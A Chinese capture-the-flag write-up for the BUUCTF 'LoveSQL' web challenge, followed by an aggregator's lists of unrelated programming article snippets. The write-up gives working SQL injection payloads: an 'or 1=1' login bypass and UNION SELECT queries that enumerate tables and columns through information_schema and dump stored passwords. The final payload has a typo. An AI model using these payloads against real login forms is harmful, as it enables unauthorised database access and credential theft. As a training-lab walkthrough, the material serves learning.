BUUCTF【Web】LoveSQL

2023-11-04

进入靶场后感觉这个SQL很熟悉，跟之前的第一关easySQL相似。但是这关显然要更难一点。

还是用之前的方法，用1'试试发现有回显，所以这一关还是单引号闭合。

首先使用万能用户名，密码随便输入

1' or 1=1#

得到提示，此时发现他的用户名是adimin，密码是72f7a6b4e1887bbc55e9d38486f2c1a2。但是输入后得到错误，说明此时万能用户名行不通

既然万能用户名行不通，那么我们就使用万能密码，用户名使用admin。

1' union select 1,2,database()#

此时发现登录成功，并且爆出了数据库geek

在这里注意一下，在CTF中SQL注入漏洞flag通常会放在当前使用的数据库中，这里已经有了数据库所以可以直接爆出数据库的表

在密码输入以下的payload：

1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())#

爆出了geekuser和l0ve1ysq1两张表。我们要找的flag就在l0ve1ysq1表里面，为什么在第两张表里面，请张大你的眼睛看题目

既然爆出了表，接下来就是爆出表里面的字段了，同样的使用payload

1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database())#

发现爆出了字段id username password，我们的flag就在password里面。接下来就是爆出字段里面的内容，步骤同上述相同

构造的payload为：

1' union select 1,2,(select group_concat(passwprd) from l0ve1ysq1)#

最后就爆出flag了

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

buuctf

sql

web安全

BUUCTF【Web】LoveSQL 的相关文章

为什么 Clojure MySQL 查询结果中出现“M”

我有一个返回一行的 Clojure 查询下面是返回行映射的部分打印输出 employer percent 0 00M premium 621 44M 这两列在mysql表中分别是decimal 5 2 和decimal 7 2 为什么
多个数据库连接

我有三张桌子 categories content info and content The categories表包含类别的id及其 IDparent类别 The content info包含两列 entry id帖子的 ID 和cat
如何将存储过程中的值返回到 EF

我试图通过 EF 调用存储过程并从存储过程中检索返回值我用过this https stackoverflow com questions 6861737 executesqlcommand with output parameter an
SQL Server：复制表中的列

将表中的列中的所有值复制到同一表中的另一列的最简单方法是什么使用单个语句如果列具有相同的数据类型 UPDATE
如何在可能为空值的字段上创建唯一索引（Oracle 11g）？

这是包含 3 列的示例表 ID UNIQUE VALUE UNIQUE GROUP ID 我希望可以允许以下记录 1 NULL NULL 2 NULL NULL or 3 NULL 7 4 123 7 or 注意此条件不允许unique
SQL where 连接集必须包含所有值，但可以包含更多值

我有三张桌子offers sports和连接表offers sports class Offer lt ActiveRecord Base has and belongs to many sports end class Sport lt
SQL 查询在多用户环境中返回错误值

一段时间以来我们在我们的一个客户站点上发现了奇怪的数据完整性问题经过大量调查后我们现在已将其隔离为数据库调用如果两个用户同时调用同一个存储过程有时一个用户会得到另一个用户的结果我们设置了一个测试来验证这一点并且我们有一个循环
MySQL 过去 12 个月的月度销售情况，包括没有销售的月份

SELECT DATE FORMAT date b AS month SUM total price as total FROM cart WHERE date lt NOW and date gt Date add Now interva
ORDER BY id 或 date_created 显示最新结果？

我有一个表实际上有几个我想首先从中获取最新条目的结果这是我的ORDER BY条款选项 date created INT 从不改变值 id 当然是INT AUTO INCRMENT 两列应同等地代表记录插入的顺序我自然会使用date
如何列出表中的所有列？

对于各种流行的数据库系统如何列出表中的所有列对于 MySQL 请使用 DESCRIBE name of table 只要您使用 SQL Plus 或 Oracle 的 SQL Developer 这也适用于 Oracle
SQL：将一个表中的所有记录插入到另一表中，而不指定列

我想将备份表 foo bk 中的所有记录插入到 foot 表中而不指定特定的列如果我尝试这个查询 INSERT INTO foo SELECT FROM foo bk 我会收到错误插入错误列名称或提供的值的数量与表定义不匹配是否可
MySQL - 查询合并具有相同 id 的行并保留该 id 的所有条目但作为一条记录

我一直在处理本地保存在 wamp 服务器上的 mysql 数据库中的表我正在使用 wamp 中的 phpmyadmin 区域来运行查询我正在尝试获取数据来执行以下操作谁能帮我制作一张包含许多植物记录的表格植物可以有多个名称表格将其
尝试通过比较不同的表从 SQL 查询输出正确的值

我对 SQL 非常陌生需要有关如何使用正确的查询完成此任务的帮助我有 2 张桌子需要使用表 TB1 有 id Name 1 bob 2 blow 3 joe 表 TB2 有 compid property 1 bob 2 blow 我
Azure COSMOS DB 如何查询数组中的内容

如何进行查询以获取文档数组 roles 中包含某些内容的文档我想获取以下文档其中 Trainer 是数组中的元素 enabled true profilePicture null roles Trainer Client SELECT
多个连接到同一个表

我有这组表格和数据 CREATE TABLE item id INT PRIMARY KEY name VARCHAR CREATE TABLE property id INT PRIMARY KEY name VARCHAR CREATE
有很多数据库视图可以吗？

我很少每月每季度使用 Microsoft SQL Server 2005 数据库视图生成数百份 Crystal Reports 报告在我不读取这些视图的所有时间里这些视图是否会浪费 CPU 周期和 RAM 因为我很少从视图中读取数
mysql 在 sum() 函数上使用 concat，例如 concat(sum(col1),"%")

我正在尝试合并多个查询但其中一个查询使用 sum 当我尝试在此列上应用 concat 时我得到不需要的 blob 结果我如何在聚合列上应用 concat 和 union 我期待这个结果 SELECT row 1 col1 UNION
MYSQL：SQL查询获取自增字段的值

我有一张桌子主键是id及其自动递增现在当我插入新记录时我需要获取更新记录的 id 我怎样才能做到这一点如果我使用查询 select max id from table name 执行后我可以获得id 但我能确定它是刚刚插入的记录的
选定的非聚合值必须是关联组的一部分

我在 Teradata 中有两个表 Table A 和 Table B 它们之间是 LEFT JOIN 之后我将创建 SELECT 语句其中包含两个表中的属性 SELECT attribute 1 attribute 2 attribut
如何在sql server中对行号进行内连接

SQL Server 2008 两张表表A有以下数据 RowA RowB RowC RowD 表B有以下数据 Row4 Row3 Row2 Row1 我想得到以下输出 RowA Row1 RowB Row2 RowC Row3 RowD

随机推荐

facenet专题1：windows下使用train_sotfmax.py训练人脸识别模型

1 facenet github地址 https github com davidsandberg facenet 下载该project git clone https github com davidsandberg facenet 2
node : 无法将“node”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。

VScode Code Runner无法运行JavaScript js文件原因未安装Node js 解决方法 https nodejs org en 下载Nodejs 安装完之后重启VScode 会自动配置运行即可在终端看到结果
【tauri】tauri的启动、运行与打包过程步骤

兼容性 win11 系统自带 WebView2 win10 安装完会自动安装WebView2 win7 需要先手动来装WebView2 开始安装安装node 推荐用nvm将进行node版本管理安装vs 生成工具下载地址 https
单片机嵌入式毕业设计题目选题推荐

文章目录 1前言 2 如何选题 2 1 不要给自己挖坑 2 2 难度把控 2 3 如何命名题目 3 单片机嵌入式选题大全 3 1 嵌入式方向 3 2 算法方向 3 3 移动通信方向 3 4 学长作品展示 4 最后 1前言近期不少学弟学
子类的构造函数和析构函数

1 构造函数是否可以被继承子类可以继承父类的所有成员变量和成员函数但不能继承父类的构造函数因此在创建子类对象时为了初始化从父类继承来的数据成员系统需要调用其父类的额构造函数 2 父类构造函数的调用规则如果子类没有定义构造函数
axios的三层封装思想

1 工具函数层设置默认请求地址设置默认超时时间设置默认请求拦截设置默认响应拦截 ajax工具函数层 import axios from axios axios defaults baseURL http localhost 5000
vue2插件开发小试

开发vue插件的官方文档是这样描述的插件通常会为Vue添加全局功能插件的范围没有限制一般有下面几种 1 添加全局方法或者属性如 vue element 2 添加全局资源指令过滤器过渡等如 vue touch 3 通过全局 m
KDD 2023

下载地址点我跳转 1 DoubleAdapt A Meta learning Approach to Incremental Learning for Stock Trend Forecasting Code None Area 一种用于
ubuntu 安装Pangolin 过程

前言大家好好久没有写技术博客了在工作学习中遇到一些问题及解决方法希望能帮助到大家 Pangolin 想必大家都非常熟悉了这个是一款开源的OPENGL显示库可以用来视频显示而且开发容易代码我们可以从Github 进行下载 ht
JSP基础语法

1 gt 2 gt hr
C++（13）——STl之List的实现

STL STL是C 的标准模板库是一个具有工业强度高效的C 程序库 STL一个最为重要的特点就是数据结构和算法的分离你可以使用其中的一些函数操作几乎热河的数据集合包含链表容器和数组 STL的另一个特性就是它不是面向对象的 STL主
【环境配置】安装 Visual Studio 2022 Community 卡住了&& 安装 Windows SDK (Software Development Kits)卡住了

问题原因 a 系统升级了 b 之前卸载没卸载干净注册表里存在旧的信息解决过程 1 查看日志在资源管理器中输入 TEMP windowssdk 查看日志文件找到最新的日志文件在文件中搜索 Warning 出现了一组长串数字用括起
基于Matlab小车倒立摆系统的控制（附上完整源码+数据）

本文介绍了如何使用Matlab对小车倒立摆系统进行控制倒立摆是一种经典的控制系统问题通过控制小车的速度和方向实现倒立摆的平衡本文使用了模糊控制算法和PID控制算法来实现系统的控制并通过Matlab进行仿真和实验验证文章目录 1
Linux--编译链接(过程、原理、执行、多个文件)

1 编译链接四个步骤 1 预编译 gcc E main c o main i 2 编译 gcc S main i o main s 3 汇编 gcc c main s o main o 4 链接 gcc main o o main 执行 m
报错：RuntimeError: CUDA error: no kernel image is available for execution on the device

报错 RuntimeError CUDA error no kernel image is available for execution on the device 提醒安装pytorch时除了要注意pytorch与torchvisi
vue 父子子父传值

文档 Vue js 渐进式 JavaScript 框架 Vue js vuejs org 父给子传值父组件
【计算机基础】面试常问之进程、线程和协程

文章目录背景为什么会有进程线程和协程 1 进程的出现 2 线程的出现 3 协程的出现 1 进程 Process 1 1 什么是进程程序与进程的区别特点 1 2 进程通信及使用场景无名管道 pipe 命名管道 FIFO 消息队列
什么是区块链?为什么需要区块链?

从个故事开始吧第一章信任账本时代的故事小王问你借100W 答应一年后还你200W 你心动了可是又怕他不还于是乎你找到了你们村长做鉴证人你打了一个借条上面写着 2018年月小王借小胡100W 答应2019年月还小胡200W
服务器系统初始化时间长,企业级-Shell案例1——服务器系统配置初始化

bin bash 安装系统性能分析工具及其他 yum install gcc make autoconf vim sysstat net tools iostat iftop iotp wget lrzsz lsof unzip opens
BUUCTF【Web】LoveSQL

进入靶场后感觉这个SQL很熟悉跟之前的第一关easySQL相似但是这关显然要更难一点还是用之前的方法用1 试试发现有回显所以这一关还是单引号闭合首先使用万能用户名密码随便输入 1 or 1 1 得到提示此时发现他的用户名是a

BUUCTF【Web】LoveSQL

BUUCTF【Web】LoveSQL 的相关文章

随机推荐

热门标签